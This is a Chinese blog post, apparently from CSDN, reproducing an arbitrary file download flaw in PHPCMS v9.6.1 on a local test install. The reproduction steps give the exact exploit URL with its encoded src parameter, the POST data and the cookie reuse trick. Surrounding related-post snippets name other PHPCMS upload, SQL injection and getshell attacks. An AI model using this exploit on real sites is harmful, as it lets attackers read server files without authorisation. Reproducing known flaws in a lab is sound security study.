PHPCMS_v9.6.1_任意文件下载复现

最新推荐文章于 2023-09-11 17:53:44 发布
最新推荐文章于 2023-09-11 17:53:44 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xy_sugar/article/details/88765728
版权

环境搭建

①在phpstudy下进行环境的搭建

②安装成功后用之前设置的管理员账号密码登陆后台

③开启phpcms手机门户,然后退出管理后台

漏洞复现

①访问该站点http://127.0.0.1/phpcmsfx/index.php?m=wap&c=index&a=init&siteid=1并且用firebug获取该网站的cookie

②带上上一步获取到的cookie访问网站,用hackbar发送Post数据http://127.0.0.1/phpcmsfx/index.php?m=attachment&c=attachments&&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D./phpcms/module

post_data :  userid_flash=第一步获取到的cookie值

 

③用hackbar获取cookie的值

④将上一步获取到的cookie的值赋给a_k参数,成功出现下载

不必讶异无须欢喜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpcms v9文件上传漏洞
qq_50646296的博客
08-21 1809
我们通过软件burp suite 抓包,修改一个变量,不停的发包,我们可以手动或者让软件不停的访问我们呢上传的PHP,如果显示出PHP内容,时间竞争成功。方法:我们发它只是删除了压缩包里面的文件,但这段代码并不会对解压后的文件夹递归删除,只能对解压的文件直接删除。分析:当程序不递归删除时,我们直接将图片和.php文件压缩上传,会发图片还在,.php文件被删除了。此时,我们再将其上传,可以看到,我们的PHP文件就被保留下来了。我们创建一个文件夹,放入以下文件,然后将这个文件经行压缩。
2024年最新PHPcms V9 任意文件上传漏洞_phpcmsv9漏洞(1),附物联网嵌入式开发面经
最新发布
2401_85012088的博客
05-14 901
料,可以戳这里获取](https://bbs.csdn.net/topics/618679757)**
phpcmsV9官方源码漏洞
haocaicai的博客
09-27 1253
(1)、phpcms的/phpcms/libs/classes/attachment.class.php中,对输入参数$ext未进行类型限制,导致逻辑漏洞的产生。 解决方法:修改/phpcms/libs/classes/attachment.class.php文件143行左右的download方法,在方法开始位置加入: function download($field, $value,$...
phpcmsV9.6.0sql注入漏洞分析
shelter1234567的博客
09-11 1357
本次分析phpcmsV9.6.0 的sql注入漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
PHP代码审计6—文件包含漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-27 1845
文件包含漏洞整理与历史漏洞分析
PHPCMS v9.6.1 简体中文 GBK正式版
12-01
PHPCMS简介 PHPCMS采用PHP5+MYSQL做为技术基础进行开发。PHPCMS V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的
phpcms_v9.6.1_UTF8.zip_phpcms 二次开发
09-24
PHP cms 一个二次开发平台 安装即可使用。。。
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
phpcms_v9 后台上传图片按钮无法点击
06-21
因为目前浏览器不支持flash,导致phpcms后台上传图片按钮无法点击,试了很多浏览器都不行。这个方法操作简单,亲测快速有效,原理是将原来的上传图片插件更改为h5图片上传插件。
PHPCMS v9.6.1 简体中文 UTF-8 正式版
12-01
PHPCMS简介 PHPCMS采用PHP5+MYSQL做为技术基础进行开发。PHPCMS V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的
利用phpcms v9 0day拿shell+提权.wps
12-31
此Oday非同寻常,速度下载吧黑友们!一天几个站没问题!
phpcmsv9最新利用工具
04-01
phpcmsv9最新利用工具
phpcms v9.6.0版本
09-09
phpcms v9.6.0版本 注册处存在一个前台getshell的漏洞,特地保留这个版本,分享给大家学习使用。 phpcms是一个比较流行的cms.
phpcms 漏洞处理过的系统.rar
10-30
对phpcms系统的漏洞进行修;删除不必要的功能;去除phpcms标识。
phpcms 漏洞姿势
热门推荐
2ed
06-26 2万+
一 .PHPCMS V9本地文件包含漏洞 漏洞出在如下文件:phpcms/modules/search/index.php 代码如下: 本处大家会发在使用file_get_contents函数时没有过滤get方式得到的m参数 因此可以构造payload如下 www.xxx.com/m=search&a=public_get_suggest_keyword&q=../../ph...
【2】phpcms v9.6.0任意文件上传漏洞
司徒荆的博客
05-21 2503
phpcms v9.6.0任意文件上传漏洞
PHPcms V9 任意文件上传漏洞
Azjj
09-04 5747
之前碰到一个站点,存在目录遍历,看到upload目录下上传了好多php的大马,说明这网站肯定是有漏洞的,看了一下网站指纹,是phpcms的,正好借此网站一下此漏洞 一丶漏洞简介 此漏洞爆出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。 二丶影响版本 phpcms v9.6.0 三丶漏洞分析 漏洞利用点是注册的地方,我们来看一下网上常用的一个payload: http://127.0.0.1/index.php.
phpcms之 文件下载的页面
weixin_44415928的博客
02-23 574
前边我们总结了单页面和新闻列表页的制作以及轮播图的制作,下面我们来说一个网站十分重要的内容,那就是下载页面。制作过程和前边的无异。我们新建一个栏目 我们选择添加栏目,选择下载模型 栏目列表页模板好选择,就是内容页不好搞啊,我们还要新建一个showDownload.html来作为下载页的模板 如下,catid就是下载栏目的ID,这里的{$v[fileurl]}和{$v[fielname]}表示的...
phpcms php5.5,phpcms_v9.5.8_GBK源码下载
05-21
phpcms_v9.5.8_GBK:http://www.phpcms.cn/download/package/phpcms_v9.5.8_GBK.zip phpcms_v9.5.8_UTF8:http://www.phpcms.cn/download/package/phpcms_v9.5.8_UTF8.zip 请注意,phpcms官方已经停止维护php5.5...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值